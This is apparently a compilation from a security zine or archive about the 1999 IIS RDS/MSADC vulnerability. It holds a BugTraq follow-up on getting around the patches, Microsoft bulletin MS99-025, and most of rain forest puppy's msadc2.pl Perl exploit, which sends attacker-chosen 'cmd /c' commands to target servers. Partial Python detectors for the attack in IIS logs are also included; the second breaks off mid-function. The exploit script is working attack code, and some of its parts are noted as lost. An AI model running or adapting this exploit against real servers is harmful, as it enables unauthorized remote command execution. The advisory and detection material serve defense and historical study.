$drive . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next time\n"; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server doesn't seem to be installed.\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n"; if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else { print "Something's borked. Use verbose next time\n";}}} print "\n"; close(IN);} ############################################################################## sub sendraw2 { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ print "Connected. 
Getting data"; open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr;
  while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
  close(OUT); select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }}

##############################################################################

sub content_start { # this will take in the server headers
 my (@in)=@_; my $c;
 for ($c=1;$c<500;$c++) {
  if($in[$c] =~/^\x0d\x0a/){
   if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
   else { return $c+1; }}}
 return -1;} # it should never get here actually

##############################################################################

sub funky {
 my (@in)=@_; my $error=odbc_error(@in);
 if($error=~/ADO could not find the specified provider/){
  print "\nServer returned an ADO misconfiguration message\nAborting.\n";
  exit;}
 if($error=~/A Handler is required/){
  print "\nServer has custom handler filters (they most likely are patched)\n";
  exit;}
 if($error=~/specified Handler has denied Access/){
  print "\nServer has custom handler filters (they most likely are patched)\n";
  exit;}}

##############################################################################

sub has_msadc {
 my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
 my $base=content_start(@results);
 return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
 return 0;}

##############################################################################

EoF

-=- Followup/update to IIS/RDS advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To: BugTraq
Subject: Update to ODBC/RDS vulnerabilities
Date: Tue Sep 21 1999 12:07:54

Hello all,

It's been a while since I've posted anything, and I promise it will be short this time. ;)

Microsoft has released a patched Jet ODBC engine that will fix the ODBC problem as well as Mr. Cuartango's Excel vulnerabilities.
Basically, this is a 3.51 engine retrofitted with a 'sandbox' restriction controlled by the following registry key:

\\HKLM\Software\Microsoft\Jet\3.5\Engines\SandboxMode

Also, as for the RDS problem, they recommended implementing custom handlers to limit invocation of the RDS component to legit uses. Custom handler support is controlled by the following registry key:

\\HKLM\Software\Microsoft\DataFactory\HandlerInfo\handlerRequired

Now, perhaps it's just me, but on three different NT boxes I have, which are various SP3 and 5 combos on NT4, patches installed as administrator, the permissions on these registry keys are Everyone -> Special Access, which includes Set Value. This basically means domain users can remotely disable handler and sandbox restrictions by changing the values of these keys. Hmmm. I've tested this, and it worked as expected.

Also, Mnemonix pointed out an interesting aspect which I overlooked for the RDS vulnerability that really makes it more evil. The current limitation to the RDS exploit is that it requires a local file to 'attach' to, specifically a .mdb. Well, you can use UNC addresses for this file, so if you set up a Windows share on the internet, you can request your file off that, therefore bypassing the need for a local file. I've tested this, and it works as well.

I am finishing updates to my RDS exploit program, which I'll probably release in the next week. It will implement all of this, plus clean up the code a bit.

Also, I wanted to point out an omission of credit in the RDS advisory. Matthew Astley, who I co-wrote the May 25th advisory with the original ODBC info, should have been given credit as well for the ODBC/Jet pipe problem. Apologies to Matthew.

.rain.forest.puppy.

--------------------------------------------------------------------------
If I had a signoff banner, it would be here. But I don't, so I'll fake it
--------------------------------------------------------------------------

EoF

-=- MS99-025: Microsoft advisory for RDS/IIS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox.

********************************

Microsoft Security Bulletin (MS99-025)
--------------------------------------

Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access with RDS

Originally Released as MS98-004: July 17, 1998
Re-Released as MS99-025: July 19, 1999
Revised: July 23, 1999

Summary
=======

Microsoft has identified a vulnerability in Microsoft(r) Data Access Components (MDAC) that could allow a web site visitor to take unauthorized actions on a web site hosted using Internet Information Server. The vulnerability can be eliminated by reconfiguring or removing the affected components of MDAC.

This vulnerability originally was reported in Microsoft Security Bulletin MS98-004, issued July 17, 1998. It was re-released on July 19, 1999, to remind customers of the need to address the vulnerability. It was updated on July 23, 1999, to discuss the need to remove sample files that are affected by the vulnerability, and to clarify that MDAC 2.0 is affected even if deployed as a clean installation.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-025faq.asp. The FAQ contains instructions for eliminating the vulnerability.

Issue
=====

The RDS DataFactory object, a component of Microsoft Data Access Components (MDAC), exposes unsafe methods. When installed on a system running Internet Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise unauthorized web user to perform privileged actions, including:

- Allowing unauthorized users to execute shell commands on the IIS system as a privileged user.
- On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL and other ODBC data requests through the public connection to a private back-end network.
- Allowing unauthorized access to secured, non-published files on the IIS system.

Affected Software Versions
==========================

The vulnerability affects the Microsoft Data Access Components, when installed on a web server running Internet Information Server 3.0 or 4.0. Specifically:

- MDAC 1.5 and 2.0 are affected
- MDAC 2.1 is affected if installed as an upgrade from a previous version of MDAC, rather than a clean installation
- Any version of MDAC is affected if Sample Pages for RDS are installed.

NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option Pack and the MDAC 2.0 Software Development Kit. They are not installed by default in the Option Pack, but are installed by default in the MDAC 2.0 SDK.

NOTE: MDAC 1.5 and IIS are installed by default installations of the Windows NT 4.0 Option Pack.

NOTE: IIS can be installed as part of other Microsoft products, such as Microsoft BackOffice and Microsoft Site Server. MDAC can be installed as part of other Microsoft products, such as Visual C and Microsoft Office.

Patch Availability
==================

This vulnerability requires a configuration change to eliminate it, rather than a patch. Details of the specific changes needed are available at http://www.microsoft.com/security/bulletins/MS99-025faq.asp.

More Information
================

Please see the following references for more information related to this issue.

- Microsoft Security Bulletin MS99-025: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-025faq.asp
- Microsoft Knowledge Base (KB) article Q184375, Security Implications of RDS 1.5, IIS, and ODBC, http://support.microsoft.com/support/kb/articles/q184/3/75.asp
- Microsoft Universal Data Access Download Page, http://www.microsoft.com/data/download.htm
- Installing MDAC Q&A, http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm
- Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp
- IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp

Obtaining Support on this Issue
===============================

Microsoft Data Access Components (MDAC) is a fully supported set of technologies. If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============

Microsoft acknowledges Greg Gonzalez of ITE (http://www.ite.com) for bringing additional information regarding this vulnerability to our attention, and .Rain.Forest.Puppy for identifying the involvement of Sample Pages for RDS. Microsoft also acknowledges Russ Cooper of NTBugTraq (http://www.ntbugtraq.com) for his assistance around this issue.

Revisions
=========

- July 19, 1999: Bulletin Created as re-release of MS98-004.
- July 23, 1999: Bulletin updated to discuss involvement of Sample Pages for RDS, and to clarify status of MDAC 2.0.

------------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************

You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM. The subject line and message body are not used in processing the request, and can be anything you like.

For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.

msadc2.pl
~~~~~~~~~

Prior to the preceding, this was the code commonly used to exploit and deface NT servers ...
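The request patterns the two RFP advisories and the Microsoft bulletin above turn on are also what an IIS administrator can hunt for in the web server logs: a plain GET for /msadc/msadcs.dll (the "is it there?" check the scripts' has_msadc routine makes), a run of POSTs to the msadcs.dll handler while DSNs and .mdb files are enumerated, and a request for /scripts/tools/makedsn.exe. The following checker is an added example written for this zine reprint; it is not RFP's code, not part of msadc2.pl and not from Microsoft. The W3C extended log lines, IP addresses and timestamps are constructed, and the `/msadc/msadcs.dll/AdvancedDataFactory.Query` URL form is assumed from the `AdvancedDataFactory.Query` handler name that msadc2.pl uses.

```python
"""Flag RDS/MSADC probing in IIS W3C extended log lines (added example)."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample log (W3C extended format). IPs, times and the request
# lines are made up for this example; the URL shapes follow the advisories
# (msadcs.dll probe, AdvancedDataFactory.Query handler, makedsn.exe check).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-09-21 12:07:01 10.0.0.5 GET /default.htm - 200
1999-09-21 12:07:03 192.0.2.10 GET /msadc/msadcs.dll - 200
1999-09-21 12:07:04 192.0.2.10 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200
1999-09-21 12:07:05 192.0.2.10 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200
1999-09-21 12:07:06 192.0.2.10 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200
1999-09-21 12:07:07 192.0.2.10 GET /scripts/tools/makedsn.exe - 404
1999-09-21 12:07:09 10.0.0.5 GET /images/logo.gif - 200
1999-09-21 12:07:30 203.0.113.7 GET /msadc/msadcs.dll - 404
"""

DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

MSADC_RE = re.compile(r"^/msadc/msadcs\.dll(?:/|$)", re.IGNORECASE)
MAKEDSN_RE = re.compile(r"^/scripts/tools/makedsn\.exe$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    ip: str
    rule: str
    detail: str


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts.

    A '#Fields:' directive, when present, names the columns; other '#'
    lines are directives and are skipped. Lines whose field count does
    not match are dropped rather than guessed at.
    """
    fields = list(DEFAULT_FIELDS)
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue
        records.append(dict(zip(fields, parts)))
    return records


def detect_rds_probing(records, burst_threshold=3):
    """Return Findings for RDS-related requests.

    rds_probe     - GET of msadcs.dll itself (the 'is it there?' check)
    rds_query     - POST to msadcs.dll/<handler> (an actual RDS query)
    rds_burst     - at least burst_threshold queries from one IP, the
                    shape of DSN/.mdb enumeration
    makedsn_probe - any request for /scripts/tools/makedsn.exe
    """
    findings = []
    queries_per_ip = Counter()
    for r in records:
        ip, method = r["c-ip"], r["cs-method"].upper()
        stem, status = r["cs-uri-stem"], r["sc-status"]
        if MSADC_RE.match(stem):
            if method == "GET" and stem.lower() == "/msadc/msadcs.dll":
                findings.append(Finding(ip, "rds_probe", f"GET {stem} -> {status}"))
            elif method == "POST":
                queries_per_ip[ip] += 1
                findings.append(Finding(ip, "rds_query", f"POST {stem} -> {status}"))
        elif MAKEDSN_RE.match(stem):
            findings.append(Finding(ip, "makedsn_probe", f"{method} {stem} -> {status}"))
    for ip, n in queries_per_ip.items():
        if n >= burst_threshold:
            findings.append(Finding(ip, "rds_burst", f"{n} RDS queries"))
    return findings


def summarize(findings):
    """Map each source IP to the sorted list of distinct rules it triggered."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f.ip, set()).add(f.rule)
    return {ip: sorted(rules) for ip, rules in by_ip.items()}


if __name__ == "__main__":
    hits = detect_rds_probing(parse_w3c(SAMPLE_LOG))
    for f in hits:
        print(f"{f.ip:<14} {f.rule:<14} {f.detail}")
    print(summarize(hits))
```

A 404 on the probe is still worth keeping: it tells you who is looking even on a host where msadcs.dll has already been removed, and a source that trips the probe, the query burst and the makedsn.exe check in the same minute is running the whole step sequence described in the advisory rather than browsing.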
Source: PSS url:http://packetstorm.securify.com/9911-exploits/msadc2.pl

#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well

use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);

print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
        -h <host>     = host you want to scan (ip or domain)
        -d <seconds>  = delay between calls, default 1 second
        -X            = dump Index Server path table, if available
        -N            = query VbBusObj for NetBIOS name
        -V            = use VbBusObj instead of ActiveDataFactory
        -v            = verbose
        -e            = external dictionary file for step 5
        -u <\\\\host\\share\\file> = use UNC file
        -w            = Windows 95 instead of Windows NT
        -c            = v1 compatibility (three step query)
        -s <#>        = run only step <#>

  Or a -R will resume a (v2) command session

~; exit;}

###########################################################
# config data

@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");

# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");

# this is sparse, because I don't know of many
@sysmdbs=(  "\\catroot\\icatalog.mdb",
            "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
            "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
            "\\system32\\certmdb.mdb",
            "\\system32\\ias\\ias.mdb",
            "\\system32\\ias\\dnary.mdb",
            "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

@mdbs=(     "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
            "\\cfusion\\cfapps\\forums\\forums_.mdb",
            "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
            "\\cfusion\\cfapps\\security\\realm_.mdb",
            "\\cfusion\\cfapps\\security\\data\\realm.mdb",
            "\\cfusion\\database\\cfexamples.mdb",
            "\\cfusion\\database\\cfsnippets.mdb",
            "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
            "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
            "\\cfusion\\brighttiger\\database\\cleam.mdb",
            "\\cfusion\\database\\smpolicy.mdb",
            "\\cfusion\\database\\cypress.mdb",
            "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
            "\\website\\cgi-win\\dbsample.mdb",
            "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
            "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \

###########################################################

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }

print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;

if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}

if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else { print "<<fail>>\n"; }}
# we need to sleep to let the server catchup

if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}

if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}

if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\nStep 5: Trying UNC...";
&use_unc; } else { print "\nNo -u; Step 5 skipped.\n"; }}

if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { print "\nNo -e; Step 6 skipped.\n"; }}

print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;

##############################################################################

sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                open(OUT,">raw.out");   my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ print OUT $_; push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                close(OUT); select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header {  # make the HTTP request
 my $aa, $bb;
 if (defined $args{V}){
  $aa="VbBusObj.VbBusObjCls.GetRecordset";
  $bb="2";
 } else {
  $aa="AdvancedDataFactory.Query";
  $bb="3";}

$msadc=<

 [ The archived copy loses everything from the opening of this heredoc
   to the tail of make_dsn below: the rest of make_header, and the
   definitions of make_req and rdo_success that the script calls, are
   not in this copy. Fetch the complete script from the PSS url above. - Ed ]

                                    Datasource creation successful<\/H2>/;}}
 } return 0;}

##############################################################################

sub verify_exists {
 my ($page)=@_;
 my @results=sendraw("GET $page HTTP/1.0\n\n");
 return $results[0];}

##############################################################################

sub try_btcustmr {

 foreach $dir (@sysdirs) {
  print "$dir -> "; # fun status so you can see progress
  foreach $drive (@drives) {
   print "$drive: "; # ditto
   $reqlen=length( make_req(1,$drive,$dir) ) - 28;
   $reqlenlen=length( "$reqlen" );
   $clen= 206 + $reqlenlen + $reqlen;

   my @results=sendraw(make_header() . make_req(1,$drive,$dir));
   if (rdo_success(@results)){print "Success!\n";
     save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
     exit;}
   else { verbose(odbc_error(@results)); funky(@results);}}
  print "\n";}}

##############################################################################

sub odbc_error {
 my (@in)=@_; my $base;
 my $base = content_start(@in);
 if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
 $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
 $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
 $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
 return $in[$base+4].$in[$base+5].$in[$base+6];}
 print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
 print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
  $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
 my ($in)=@_;
 return if !$verbose;
 print STDOUT "\n$in\n";}

##############################################################################

sub save {
 my ($p1)=@_;
 my $ropt="";
 open(OUT, ">rds.save") || print "Problem saving parameters...\n";
 if (defined $args{c}){ $ropt="c ";}
 if (defined $args{V}){ $ropt.="V ";}
 if (defined $args{w}){ $ropt.="w ";}
 print OUT "v2\n$ip\n$ropt\n$p1\n";
 close OUT;}

##############################################################################

sub load {
 my ($action)=@_;
 my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
 open(IN,"<rds.save") || die("Can't open rds.save\n");
 @p=<IN>; close(IN);
 die("Wrong rds.save version") if $p[0] ne "v2\n";
 $ip="$p[1]"; $ip=~s/\n//g; $target= inet_aton($ip) || die("inet_aton problems");
 print "Resuming to $ip ...";
 @switches=split(/ /,$p[2]);
 foreach $switch (@switches) { $args{$switch}="1";}
 if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
 print "Type the command line you want to run ($comm assumed):\n"
 . "$comm ";
 $in=<STDIN>; chomp $in;
 $command="$comm " . $in ;
 $torun="$p[3]"; $torun=~s/\n//g;
 if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work
 if($torun=~/^dbq/){ $torun=$drvst.$torun; }
 if(run_query("$torun")){
  print "Success!\n";} else { print "failed\n"; }
 exit;}

##############################################################################

sub create_table {
 return 1 if (!defined $args{c});
 return 1 if (defined $args{V});
 my ($in)=@_;
 $reqlen=length( make_req(2,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(2,$in,""));
 return 1 if rdo_success(@results);
 my $temp= odbc_error(@results); verbose($temp);
 return 1 if $temp=~/Table 'AZZ' already exists/;
 return 0;}

##############################################################################

sub known_dsn {
 foreach $dSn (@dsns) {
  print ".";
  next if (!is_access("DSN=$dSn"));
  if(create_table("DSN=$dSn")){
   if(run_query("DSN=$dSn")){
    print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}}
 print "\n";}

##############################################################################

sub is_access {
 my ($in)=@_;
 return 1 if (!defined $args{c});
 return 1 if (defined $args{V});
 $reqlen=length( make_req(5,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(5,$in,""));
 my $temp= odbc_error(@results);
 verbose($temp); return 1 if ($temp=~/Microsoft Access/);
 return 0;}

##############################################################################

sub run_query {
 my ($in)=@_; my $req;
 if (defined $args{c}){$req=3;} else {$req=6;}
 $reqlen=length( make_req($req,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req($req,$in,""));
 return 1 if rdo_success(@results);
 my $temp= odbc_error(@results); verbose($temp);
 return 0;}

##############################################################################

sub known_mdb {
 my @drives=("c","d","e","f","g");
 my @dirs=("winnt","winnt35","winnt351","win","windows");
 my $dir, $drive, $mdb;
 my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

 foreach $drive (@drives) {
  foreach $dir (@sysdirs){
   foreach $mdb (@sysmdbs) {
    print ".";
    if(create_table($drv.$drive.":\\".$dir.$mdb)){
     if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
      print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
 }}}}}

 foreach $drive (@drives) {
  foreach $mdb (@mdbs) {
   print ".";
   if(create_table($drv.$drive.":".$mdb)){
    if(run_query($drv.$drive.":".$mdb)){
     print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
 }}}}
}

##############################################################################

sub hork_idx {
 print "\nAttempting to dump Index Server tables...\n";
 print "  NOTE: Sometimes this takes a while, other times it stalls\n\n";
 $reqlen=length( make_req(4,"","") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(4,"",""));
 if (rdo_success(@results)){
  my $max=@results; my $c; my %d;
  for($c=19; $c<$max; $c++){
   $results[$c]=~s/\x00//g;
   $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
   $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
   $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
   $d{"$1$2"}="";}
  foreach $c (keys %d){ print "$c\n"; }
 } else {print "Index server not installed/query failed\n"; }}

##############################################################################

sub dsn_dict {
 open(IN, "<$args{e}") || die("Can't open external dictionary\n");
 while(<IN>){
  $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
  next if (!is_access("DSN=$dSn"));
  if(create_table("DSN=$dSn")){
   if(run_query("DSN=$dSn")){
    print "Success!\n"; save ("dsn=$dSn"); exit; }}}
 print "\n"; close(IN);}

##############################################################################

sub content_start { # this will take in the server headers
 my (@in)=@_; my $c;
 for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
  if($in[$c] =~/^\x0d\x0a/){
   if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
   else { return $c+1; }}}
 return -1;} # it should never get here actually

##############################################################################

sub funky {
 my (@in)=@_; my $error=odbc_error(@in);
 if($error=~/ADO could not find the specified provider/){
  print "\nServer returned an ADO miscofiguration message\nAborting.\n";
  exit;}
 if($error=~/A Handler is required/){
  print "\nServer has custom handler filters (they most likely are patched)\n";
  exit;}
 if($error=~/specified Handler has denied Access/){
  print "\nADO handlers denied access (they most likely are patched)\n";
  exit;}
 if($error=~/server has denied access/){
  print "\nADO handlers denied access (they most likely are patched)\n";
  exit;}}

##############################################################################

sub has_msadc {
 my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
 my $base=content_start(@results);
 return if($results[$base]=~/Content-Type: application\/x-varg/);
 my @s=grep("^Server:",@results);
 if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
 else { print "/msadc/msadcs.dll was not found.\n";}
 exit;}

##############################################################################

sub use_unc {
 $uncpath=$args{u};
 $driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
 if($uncpath!~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
  print "Your UNC path sucks. You need the following format:\n".
  "\\\\server(ip preferable)\\share\\some-file.mdb\n\n"; exit; }
 if(create_table($driverline.$uncpath)){
  if(run_query($driverline.$uncpath)){
   print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}

##############################################################################

sub get_name { # this was added last minute
 my $msadc=<

 [ The heredoc and request code of get_name are lost from this copy in the
   same way as make_header above; only the tail survives. - Ed ]

                                                           .,?]//g;
 print "Machine name: $results[$base+6]\n";}

##############################################################################

# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't.  Don't feel slighted if
# your not on the list...
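The script above leaves a very recognisable trail in the web server log: a GET for /msadc/msadcs.dll (the has_msadc check), followed by POSTs to the AdvancedDataFactory.Query or VbBusObj.VbBusObjCls.GetRecordset handler. The following Python is an added example, not part of rfp's script or of this issue, showing how to pull those events out of an IIS log and separate reconnaissance from an actual query. The log lines are constructed for the example (W3C extended format with the field order shown in the #Fields line); the handler names and the DLL path are the ones the script uses.

```python
import re
from typing import Dict, Optional

RDS_DLL = "/msadc/msadcs.dll"
# Handler names taken from msadc2.pl: AdvancedDataFactory.Query is the default,
# VbBusObj.VbBusObjCls.GetRecordset is what -V / -N use. Compared lowercase
# because IIS paths are case-insensitive.
RDS_HANDLERS = {"advanceddatafactory.query", "vbbusobj.vbbusobjcls.getrecordset"}

# W3C extended format with the fields declared in the sample's #Fields line.
LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<uri>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Constructed sample log, not real traffic: 10.0.0.7 probes the DLL and then
# queries both handlers; 10.0.0.9 probes a server that does not have msadcs.dll.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-04-01 02:11:03 10.0.0.7 GET /default.htm - 200
2000-04-01 02:11:09 10.0.0.7 GET /msadc/msadcs.dll - 200
2000-04-01 02:11:10 10.0.0.7 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200
2000-04-01 02:11:14 10.0.0.7 POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetRecordset - 200
2000-04-01 02:30:00 10.0.0.9 GET /msadc/msadcs.dll - 404
"""


def classify(method: str, uri: str, status: int) -> Optional[str]:
    """Map one request to an RDS event type, or None if it is unrelated."""
    low = uri.lower()
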